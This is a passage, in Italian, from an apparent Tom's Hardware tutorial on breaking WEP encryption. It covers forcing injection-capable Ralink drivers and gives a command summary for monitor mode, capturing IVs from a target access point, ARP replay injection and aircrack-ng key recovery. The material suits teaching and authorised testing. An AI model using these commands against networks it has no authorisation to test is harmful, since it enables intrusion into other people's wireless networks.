Riassunto dei comandi

Dicono che è facile, voi sareste capaci? In questo articolo vi spiegheremo passo per passo come rompere una chiave WEP.

Avatar di Tom's Hardware

a cura di Tom's Hardware

Appendice 2: Utilizzare il chipset Ralink

Un'altra scheda WLAN che abbiamo usato era l'Edimax EW-7318USG. Questa scheda USB è supportata dal pacchetto aircrack-ng (così come Kismet, se preferite usare quest'ultimo) ed utilizza un chipset Ralink. Particolare molto importante, permette di connettere una antenna esterna.

Abbiamo recuperato questa unità in Inghilterra, dalla Dabs, ma si tratta di un dispositivo che viene distribuito sotto molti marchi; per esempio potreste trovarlo, negli Stati Uniti, anche come Hawking HWUG1 (a circa 43$). Può essere collegato ad un cavo di estensione USB e ad un'antenna ad alto guadagno opzionale, per poi essere posizionato su una finestra di casa o in macchina così da ottenere una miglior copertura del segnale.

Questo adattatore comunque, richiede alcuni passi aggiuntivi da seguire per poter essere usato al meglio durante un attacco ARP Replay.

BT2 utilizza il driver RT2500 di default per questa scheda, ma non supporta packet injection; avrete quindi bisogno di forzare BT2 ad utilizzare i driver RT73.

Rimuovete la scheda e digitate il seguente comando in una finestra di shell di BT2:

modprobe rt73

Reinserite il dispositivo e controllate che sia acceso e funzionante digitando:

ifconfig rausb0 up

Successivamente dovrete abilitare le intestazioni PRISM, consentire la trasmissione mentre si è in modalità Monitor e impostare la scheda per la stessa modalità Monitor :

iwpriv rausb0 forceprism 1

iwpriv rausb0 rfmontx 1

iwconfig rausb0 mode monitor

Potete seguire il resto della guida partendo dal punto 3, sostituendo rausb0 ogni volta che incontrate un ath0 nelle righe di comando.

Riassunto dei comandi

Passaggio alla modalità Monitor con airmon-ng

airmon-ng stop [scheda WLAN]

airmon-ng start [scheda WLAN]

Controllo Wireless con airodump-ng

airodump-ng --ivs --write [prefisso capturefile] [scheda WLAN]

Controllo Wireless con airodump-ng 0.9.1 per PTW

airodump-ng --write [prefisso capturefile] [scheda WLAN]

Cattura IV con airodump-ng

airodump-ng --ivs --channel [canale AP] --bssid [BSSID AP] --write capturefile [scheda WLAN]

Cattura IV con airodump-ng 0.9.1 per PTW

airodump-ng --channel [canale AP] --bssid [BSSID AP] --write capturefile [scheda WLAN]

aireplay-ng con ARP Replay

aireplay-ng --arpreplay -b [BSSID AP] -h [indirizzo MAC del client, preso da airodump] [scheda WLAN]

Rottura chiave WEP con aircrack-ng

aircrack-ng -b [BSSID AP] [nome dei file catturati]*.ivs

Rottura chiave WEP con aircrack-ng e Fattore Falsificazione 4

aircrack-ng -f 4 -b [BSSID AP] [nome dei file catturati]*.ivs

Rottura chiave WEP con aircrack-ng, Fattore di Falsificazione 8 e Forza bruta sugli ultimi 2 byte

aircrack-ng -f 8 -x2 -b [BSSID AP] [nome dei file catturati]*.ivs

Rottura chiave WEP con aircrack-ng 0.9.1 e metodo PTW

aircrack-ng -z -b [BSSID AP] [nome dei file catturati]*.cap